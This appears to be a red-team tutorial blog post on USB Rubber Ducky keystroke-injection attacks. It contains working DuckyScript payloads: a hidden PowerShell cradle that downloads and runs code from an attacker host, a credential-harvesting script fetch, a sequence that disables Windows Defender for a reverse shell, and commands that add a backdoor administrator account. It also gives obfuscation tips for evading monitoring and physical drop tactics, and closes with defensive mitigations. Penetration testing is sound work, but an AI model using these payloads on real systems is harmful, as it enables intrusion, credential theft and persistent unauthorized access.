USB Rubber Ducky: Keystroke Injection Attacks for Penetration Testers
The USB Rubber Ducky looks like an ordinary flash drive. Plug it into any computer and it immediately impersonates a keyboard — typing payloads at hundreds of keystrokes per second, executing code before the user can react, bypassing endpoint security tools that don't flag keyboard input.
It's one of the most effective physical attack vectors in existence. And it's been a red team staple since 2010.
What Is the USB Rubber Ducky?
The USB Rubber Ducky is a Human Interface Device (HID) attack tool manufactured by Hak5. When plugged into a target computer, the OS recognizes it as a keyboard (not a storage device), loading its driver automatically — no user interaction required, no UAC prompts for device installation.
The device executes payloads written in DuckyScript, a simple scripting language for keystroke sequences. It can open a terminal, download and execute a payload, exfiltrate data, add a user account, install persistence mechanisms, or do anything else a keyboard could do — in seconds.
Why HID Attacks Are Effective
Traditional endpoint security focuses on file-based threats: malicious executables, suspicious downloads, script execution. HID attacks bypass this entirely because:
- The OS trusts keyboards — HID devices are in the USB spec's trusted category
- No file ever touches disk — payloads execute entirely in memory via legitimate system tools
- It's just keystrokes — PowerShell, CMD, Bash all accept keyboard input as legitimate
- Speed eliminates human intervention — 1000ms of typing can complete before a user can pull the cable
DuckyScript Basics
DuckyScript 3.0 is the current version, supporting variables, conditionals, loops, and functions. Here's the fundamentals:
REM Basic payload structure
DELAY 1000 // Wait for OS to recognize device
GUI r // Windows + R (Run dialog)
DELAY 500
STRING powershell -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
ENTERKey Commands
| Command | Function |
|---------|----------|
| DELAY | Wait in milliseconds |
| STRING | Type a string of characters |
| ENTER | Press Enter |
| GUI | Windows key |
| CTRL | Control key |
| ALT | Alt key |
| SHIFT | Shift key |
| REM | Comment |
| REPEAT | Repeat previous command N times |
OS-Aware Payloads (DuckyScript 3.0)
ATTACKMODE HID STORAGE
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRING cmd /c payload_windows.bat
ENTER
ELSE IF ($_OS == MACOS) THEN
GUI SPACE
DELAY 500
STRING terminal
ENTER
END_IF
Real Red Team Scenarios
Scenario 1: QuickCreds — Credential Harvest
One of the most popular Rubber Ducky payloads, QuickCreds deploys Responder via PowerShell to capture NetNTLMv2 hashes from the target machine's network connections. On an internal network, these can be cracked offline or relayed for authentication.
DELAY 1000
GUI r
DELAY 500
STRING powershell -ep bypass -w h
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://impersonate.sh/quickcreds.ps1')
ENTERScenario 2: Reverse Shell Drop
Deploy a reverse shell payload that phones home to your C2 server, giving persistent remote access even after the device is removed:
DELAY 2000
CTRL ESCAPE
DELAY 500
STRING powershell
SHIFT ENTER // Run as Administrator
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $true; IEX...
ENTERScenario 3: Data Exfiltration
The Rubber Ducky can also read from the filesystem and exfiltrate data to an attacker-controlled server — useful for demonstrating what an insider threat could steal in 60 seconds of physical access.
Scenario 4: Adding a Backdoor User
DELAY 1000
GUI x
DELAY 500
STRING a
DELAY 1000
STRING net user backdoor P@ssw0rd123 /add
ENTER
STRING net localgroup administrators backdoor /add
ENTER
STRING exit
ENTERWriting Effective Payloads
Timing Is Everything
The most common payload failure is timing. Different computers boot and open dialogs at different speeds. Use generous DELAY values and test on hardware similar to the target environment.
Payload Obfuscation
Defenders who monitor process creation may flag PowerShell with suspicious arguments. Techniques include:
- Base64 encoding payloads
- Using alternative download cradles (WMIC, certutil, bitsadmin)
- Living off the land with built-in Windows tools
- Splitting payloads across multiple commands
Testing Your Payloads
Always test payloads in an isolated VM before use in an engagement. The Hak5 payload library on GitHub contains hundreds of community-tested payloads for reference.
Physical Deployment Tactics
The Rubber Ducky requires physical access — which is the point. Common deployment scenarios in authorized assessments:
- Clean desk violations: Left on a target's desk while they're away
- Tailgating follow-on: Once inside, brief physical access to an unlocked workstation
- Charging station trap: Disguised as a USB charger in a common area
- IT impersonation: Social engineering combined with physical access
Defending Against HID Attacks
As a penetration tester, your job is not just to demonstrate the attack but to recommend defenses. Key mitigations:
- USB device allowlisting via endpoint management tools (Jamf, Intune, Group Policy)
- Physical USB port locks for high-security workstations
- Screen lock policies requiring authentication after idle timeout
- USBGuard (Linux) or equivalent for port whitelisting
- Security awareness training focused on unattended workstation policy
Conclusion
The USB Rubber Ducky remains one of the most effective and straightforward physical attack tools available. Its combination of simplicity, reliability, and effectiveness against virtually all operating systems makes it a standard item in any red team kit.
In authorized penetration tests, it demonstrates the very real risk of physical access — and the inadequacy of perimeter-only security thinking. A locked door doesn't protect an unlocked workstation.
For authorized penetration testing and security research only.